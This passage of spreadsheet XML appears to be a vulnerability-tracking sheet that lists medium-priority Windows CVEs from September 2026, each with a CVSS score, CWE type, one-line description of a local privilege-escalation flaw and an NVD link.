      <c r="L2177" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69538</t>
        </is>
      </c>
    </row>
    <row r="2178">
      <c r="A2178" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69541</t>
        </is>
      </c>
      <c r="C2178" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2178" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2178" s="5" t="inlineStr"/>
      <c r="F2178" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2178" s="5" t="inlineStr"/>
      <c r="H2178" s="5" t="inlineStr"/>
      <c r="I2178" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2178" s="5" t="inlineStr"/>
      <c r="K2178" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2178" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69541</t>
        </is>
      </c>
    </row>
    <row r="2179">
      <c r="A2179" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69542</t>
        </is>
      </c>
      <c r="C2179" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2179" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2179" s="5" t="inlineStr"/>
      <c r="F2179" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2179" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2179" s="5" t="inlineStr"/>
      <c r="I2179" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2179" s="5" t="inlineStr"/>
      <c r="K2179" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2179" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Camera Frame Server Monitor allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69542</t>
        </is>
      </c>
    </row>
    <row r="2180">
      <c r="A2180" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69544</t>
        </is>
      </c>
      <c r="C2180" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2180" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2180" s="5" t="inlineStr"/>
      <c r="F2180" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2180" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2180" s="5" t="inlineStr"/>
      <c r="I2180" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2180" s="5" t="inlineStr"/>
      <c r="K2180" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2180" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows SMB Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69544</t>
        </is>
      </c>
    </row>
    <row r="2181">
      <c r="A2181" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69561</t>
        </is>
      </c>
      <c r="C2181" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2181" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2181" s="5" t="inlineStr"/>
      <c r="F2181" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2181" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2181" s="5" t="inlineStr"/>
      <c r="I2181" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2181" s="5" t="inlineStr"/>
      <c r="K2181" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2181" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows CD-ROM Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69561</t>
        </is>
      </c>
    </row>
    <row r="2182">
      <c r="A2182" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69571</t>
        </is>
      </c>
      <c r="C2182" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2182" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2182" s="5" t="inlineStr"/>
      <c r="F2182" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2182" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2182" s="5" t="inlineStr"/>
      <c r="I2182" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2182" s="5" t="inlineStr"/>
      <c r="K2182" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2182" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69571</t>
        </is>
      </c>
    </row>
    <row r="2183">
      <c r="A2183" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69576</t>
        </is>
      </c>
      <c r="C2183" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2183" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2183" s="5" t="inlineStr"/>
      <c r="F2183" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2183" s="5" t="inlineStr"/>
      <c r="H2183" s="5" t="inlineStr"/>
      <c r="I2183" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2183" s="5" t="inlineStr"/>
      <c r="K2183" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2183" s="5" t="inlineStr">
        <is>
          <t>Use after free in Graphic Fonts allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69576</t>
        </is>
      </c>
    </row>
    <row r="2184">
      <c r="A2184" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69580</t>
        </is>
      </c>
      <c r="C2184" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2184" s="5" t="inlineStr"/>
      <c r="F2184" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2184" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H218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184" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2184" s="5" t="inlineStr"/>
      <c r="K2184" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2184" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69580</t>
        </is>
      </c>
    </row>
    <row r="2185">
      <c r="A2185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69582</t>
        </is>
      </c>
      <c r="C2185" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2185" s="5" t="inlineStr"/>
      <c r="F2185" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2185" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2185" s="5" t="inlineStr"/>
      <c r="I2185" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2185" s="5" t="inlineStr"/>
      <c r="K2185" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L2185" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69582</t>
        </is>
      </c>
    </row>
    <row r="2186">
      <c r="A2186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69583</t>
        </is>
      </c>
      <c r="C2186" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2186" s="5" t="inlineStr"/>
      <c r="F2186" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2186" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2186" s="5" t="inlineStr"/>
      <c r="I2186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2186" s="5" t="inlineStr"/>
      <c r="K2186" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2186" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69583</t>
        </is>
      </c>
    </row>
    <row r="2187">
      <c r="A2187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69584</t>
        </is>
      </c>
      <c r="C2187" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2187" s="5" t="inlineStr"/>
      <c r="F2187" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2187" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2187" s="5" t="inlineStr"/>
      <c r="I2187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2187" s="5" t="inlineStr"/>
      <c r="K2187" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2187" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69584</t>
        </is>
      </c>
    </row>
    <row r="2188">
      <c r="A2188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69585</t>
        </is>
      </c>
      <c r="C2188" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2188" s="5" t="inlineStr"/>
      <c r="F2188" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2188" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2188" s="5" t="inlineStr"/>
      <c r="I2188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2188" s="5" t="inlineStr"/>
      <c r="K2188" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="L2188" s="5" t="inlineStr">
        <is>
          <t>Incorrect type conversion or cast in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69585</t>
        </is>
      </c>
    </row>
    <row r="2189">
      <c r="A2189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69589</t>
        </is>
      </c>
      <c r="C2189" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2189" s="5" t="inlineStr"/>
      <c r="F2189" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2189" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2189" s="5" t="inlineStr"/>
      <c r="I2189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2189" s="5" t="inlineStr"/>
      <c r="K2189" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2189" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69589</t>
        </is>
      </c>
    </row>
    <row r="2190">
      <c r="A2190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69592</t>
        </is>
      </c>
      <c r="C2190" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2190" s="5" t="inlineStr"/>
      <c r="F2190" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2190" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2190" s="5" t="inlineStr"/>
      <c r="I2190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2190" s="5" t="inlineStr"/>
      <c r="K2190" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2190" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69592</t>
        </is>
      </c>
    </row>
    <row r="2191">
      <c r="A2191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69593</t>
        </is>
      </c>
      <c r="C2191" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2191" s="5" t="inlineStr"/>
      <c r="F2191" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2191" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2191" s="5" t="inlineStr"/>
      <c r="I2191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2191" s="5" t="inlineStr"/>
      <c r="K2191" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2191" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69593</t>
        </is>
      </c>
    </row>
    <row r="2192">
      <c r="A2192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69594</t>
        </is>
      </c>
      <c r="C2192" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2192" s="5" t="inlineStr"/>
      <c r="F2192" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2192" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2192" s="5" t="inlineStr"/>
      <c r="I2192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2192" s="5" t="inlineStr"/>
      <c r="K2192" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2192" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69594</t>
        </is>
      </c>
    </row>
    <row r="2193">
      <c r="A2193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69604</t>
        </is>
      </c>
      <c r="C2193" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2193" s="5" t="inlineStr"/>
      <c r="F2193" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2193" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2193" s="5" t="inlineStr"/>
      <c r="I2193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2193" s="5" t="inlineStr"/>
      <c r="K2193" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2193" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t>
        </is>
      </c>
    </row>
    <row r="2194">
      <c r="A2194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69608</t>
        </is>
      </c>
      <c r="C2194" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2194" s="5" t="inlineStr"/>
      <c r="F2194" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2194" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2194" s="5" t="inlineStr"/>
      <c r="I2194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2194" s="5" t="inlineStr"/>
      <c r="K2194" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2194" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t>
        </is>
      </c>
    </row>
    <row r="2195">
      <c r="A2195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69612</t>
        </is>
      </c>
      <c r="C2195" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2195" s="5" t="inlineStr"/>
      <c r="F2195" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2195" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2195" s="5" t="inlineStr"/>
      <c r="I2195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2195" s="5" t="inlineStr"/>
      <c r="K2195" s="5" t="inlineStr">
        <is>
          <t>CWE-36</t>
        </is>
      </c>
      <c r="L2195" s="5" t="inlineStr">
        <is>
          <t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t>
        </is>
      </c>
    </row>
    <row r="2196">
      <c r="A2196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69685</t>
        </is>
      </c>
      <c r="C2196" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2196" s="5" t="inlineStr"/>
      <c r="F2196" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2196" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2196" s="5" t="inlineStr"/>
      <c r="I2196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2196" s="5" t="inlineStr"/>
      <c r="K2196" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2196" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t>
        </is>
      </c>
    </row>
    <row r="2197">
      <c r="A2197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69687</t>
        </is>
      </c>
      <c r="C2197" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2197" s="5" t="inlineStr"/>
      <c r="F2197" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2197" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2197" s="5" t="inlineStr"/>
      <c r="I2197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2197" s="5" t="inlineStr"/>
      <c r="K2197" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2197" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t>
        </is>
      </c>
    </row>
    <row r="2198">
      <c r="A2198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69691</t>
        </is>
      </c>
      <c r="C2198" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2198" s="5" t="inlineStr"/>
      <c r="F2198" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2198" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2198" s="5" t="inlineStr"/>
      <c r="I2198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2198" s="5" t="inlineStr"/>
      <c r="K2198" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2198" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t>
        </is>
      </c>
    </row>
    <row r="2199">
      <c r="A2199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69707</t>
        </is>
      </c>
      <c r="C2199" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2199" s="5" t="inlineStr"/>
      <c r="F2199" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2199" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2199" s="5" t="inlineStr"/>
      <c r="I2199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2199" s="5" t="inlineStr"/>
      <c r="K2199" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2199" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t>
        </is>
      </c>
    </row>
    <row r="2200">
      <c r="A2200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69709</t>
        </is>
      </c>
      <c r="C2200" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2200" s="5" t="inlineStr"/>
      <c r="F2200" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2200" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2200" s="5" t="inlineStr"/>
      <c r="I2200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2200" s="5" t="inlineStr"/>
      <c r="K2200" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2200" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M2200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t>
        </is>
      </c>
    </row>
    <row r="2201">
      <c r="A2201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69720</t>
        </is>
      </c>
      <c r="C2201" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2201" s="5" t="inlineStr"/>
      <c r="F2201" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2201" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2201" s="5" t="inlineStr"/>
      <c r="I2201" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2201" s="5" t="inlineStr"/>
      <c r="K2201" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2201" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t>
        </is>
      </c>
    </row>
    <row r="2202">
      <c r="A2202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
